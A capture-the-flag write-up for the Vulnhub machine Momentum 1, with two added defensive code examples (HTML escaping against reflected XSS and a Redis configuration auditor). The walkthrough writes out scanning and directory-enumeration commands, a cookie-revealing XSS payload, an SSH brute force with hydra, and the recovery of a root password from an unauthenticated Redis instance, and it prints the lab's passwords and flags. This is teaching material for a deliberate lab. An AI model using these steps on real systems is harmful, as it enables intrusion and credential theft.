Vulnhub Momentum 1 Writeup
Momentum 1
First I started off with a network scan to obtain the IP and services of the box:

```
nmap $IP/24
nmap -sC -sV -oN nmap/initial $IP
```
Once done I see that there is an SSH port and an HTTP port open on the box. Seeing that it is a webserver, I decided to start my enumeration to see if there are any extra pages I might otherwise miss:

```
gobuster dir -u http://$IP/ -w ~/path/to/wordlist.txt
```
Looking through the output I see nothing useful, so I go digging in the webpage with inspect element. While looking through the files and what happens on reload, I read the source code of the site along with the JS files and CSS. In the JS file I notice this:

```javascript
function viewDetails(str) {
    window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
```
Having just recently started looking at JavaScript, I see that there is another webpage that my enumeration couldn't find. I immediately take the bit of URL there and paste it into the URL of the site. In doing so I see that whatever I put in the id= field will be displayed on the webpage. Again, having just recently started messing with XSS, I go and try to execute an alert, and it worked (pretty simple).
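The reflection described above (the value of `id` landing in the page unchanged) is the whole bug, and the fix is to escape the value before it enters HTML. The following is an added example, not code from the writeup or from the Momentum box: it models the vulnerable behaviour next to the hardened version. The hostname `example.test` and the function names are assumptions for illustration.

```javascript
// Added example: reflected parameter rendered raw (vulnerable) versus HTML-escaped (safe).
// Not code from the box; the host and function names are placeholders.

// Escape the five characters that change meaning inside HTML text and attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Pull the id parameter out of a full request URL (searchParams percent-decodes it).
function getIdParam(requestUrl) {
  return new URL(requestUrl).searchParams.get('id') ?? '';
}

// Vulnerable rendering: the parameter is concatenated straight into the markup,
// which is what the writeup observed on opus-details.php.
function renderDetailsVulnerable(requestUrl) {
  return `<h1>Opus ${getIdParam(requestUrl)}</h1>`;
}

// Hardened rendering: the parameter is escaped first, so markup in it becomes inert text.
function renderDetailsSafe(requestUrl) {
  return `<h1>Opus ${escapeHtml(getIdParam(requestUrl))}</h1>`;
}

// Constructed probe using the same alert the writeup used to display the cookie.
const PROBE = 'http://example.test/opus-details.php?id='
  + encodeURIComponent('<script>alert(document.cookie)</script>');

console.log(renderDetailsVulnerable(PROBE)); // script tag reaches the page unchanged
console.log(renderDetailsSafe(PROBE));       // shown as literal text, never executed
```

Escaping for the HTML text context is enough here because the value is only ever placed between tags; a value placed inside an attribute, a URL, or a script block needs the encoding for that context instead.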
I tried multiple different things such as a remote shell (didn't work), LFI (didn't work), even some DB scripts, and nothing. Then while doing some research I saw that most people, when given a cookie, try stuff with that. So I went and looked at the cookie in inspect element -> Application -> Cookies, or by causing the page to execute

```
<script>alert(document.cookie)</script>
```
It looked to be encrypted, and with the info the JS file gave me I figured it was using crypto-js with AES to encrypt it. So I looked online for a decoder and found one here that was able to decrypt it for me. It needed the password in order to decrypt, which I saw in the JS file was "SecretPassphraseMomentum", and that in turn gave me this as the text: "auxerre-alienum##".
Now with this I figured that, with the SSH port open, it might be a password, but what would I use as the username and password? Given the decrypted passphrase I figured it had to be some permutation of it, so I made a [[passphrase.txt|wordlist]] to bruteforce it with hydra:

```
hydra -L wordlist.txt -P wordlist.txt <IP of target> ssh
```
And bam, I got the username and password:

```
[22][ssh] host: <ip> login: auxerre password: auxerre-alienum##
```
So I SSH'd in with the credentials:

```
ssh auxerre@<ip>
auxerre@<ip>'s password: auxerre-alienum##
```
Once in I see a user.txt; I cat it out and get:

```
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
```
First flag!!! Now to get root.
I imported [[linpeas.sh|linpeas]] to auto-enumerate and found that there was an open port, 6379, listening on localhost. After a little research I see that it is a [[6379-pentesting-redis|redis]] instance and that it could potentially be used as a privesc vector. Looking at the documentation for the commands needed to log in, I found out I can just use

```
redis-cli
```
and then, similar to an FTP connection, I can find info in the instance. Using the command

```
keys *
```
I see that there is a key called rootpass, and so I run

```
get rootpass
```
and I received this string: m0mentum-al1enum##
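Two things made this step work: the Redis instance accepted commands without a password, and a root credential was stored in it as a plain key. The second is a secrets-handling mistake no config fixes, but the first is visible in redis.conf. The following is an added example, not code from the writeup or the box: a small audit over redis.conf text that flags the directives behind an unauthenticated instance, run over a constructed weak config and a constructed hardened one. The directive names (`requirepass`, `bind`, `protected-mode`, `rename-command`) are real Redis settings; the sample values are placeholders.

```javascript
'use strict';
// Added example: audit redis.conf for the settings that let any local process dump keys.
// Not the box's configuration; both sample configs below are constructed.

// Minimal redis.conf parser: "directive arg1 arg2 ...", '#' comments, last value wins
// for single-valued directives; rename-command may appear many times so it is collected.
function parseRedisConf(text) {
  const single = {};
  const renamed = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (line === '' || line.startsWith('#')) continue;
    const [name, ...args] = line.split(/\s+/);
    if (name.toLowerCase() === 'rename-command') {
      if (args[0]) renamed.push(args[0].toUpperCase());
    } else {
      single[name.toLowerCase()] = args.join(' ');
    }
  }
  return { single, renamed };
}

// Returns a list of findings; an empty list means none of the checked weaknesses is present.
function auditRedisConf(text) {
  const { single } = parseRedisConf(text);
  const findings = [];

  const pass = single.requirepass;
  if (pass === undefined || pass === '' || pass === '""') {
    findings.push('no requirepass: anything that can reach the port can run KEYS and GET');
  }

  if (single['protected-mode'] === 'no') {
    findings.push('protected-mode no: the safety net for unbound, unauthenticated instances is off');
  }

  // With no bind directive Redis listens on every interface; wildcard binds do the same.
  if (single.bind === undefined) {
    findings.push('no bind directive: Redis listens on all interfaces');
  } else {
    const addrs = single.bind.split(/\s+/).filter(Boolean);
    if (addrs.some((a) => a === '0.0.0.0' || a === '*' || a === '::')) {
      findings.push('bind exposes the instance beyond loopback');
    }
  }
  return findings;
}

// Constructed weak config: reachable from anywhere, no password, protected mode off.
const WEAK_CONF = `
bind 0.0.0.0
protected-mode no
port 6379
# requirepass <strong-password-placeholder>
`;

// Constructed hardened config: loopback only, password required, CONFIG renamed away.
const HARDENED_CONF = `
bind 127.0.0.1
protected-mode yes
port 6379
requirepass <strong-password-placeholder>
rename-command CONFIG ""
`;

console.log('weak    :', auditRedisConf(WEAK_CONF));
console.log('hardened:', auditRedisConf(HARDENED_CONF));
```

Even the hardened config only narrows who can read the keys; a root password should not be sitting in a cache at all, and a Redis password is itself a credential that must be kept off the box's world-readable files.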
I then logged in as root with the password:

```
su root
Password: m0mentum-al1enum##
```
Once logged in I cat root.txt in /root and get:

```
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
```
I now have the final flag!!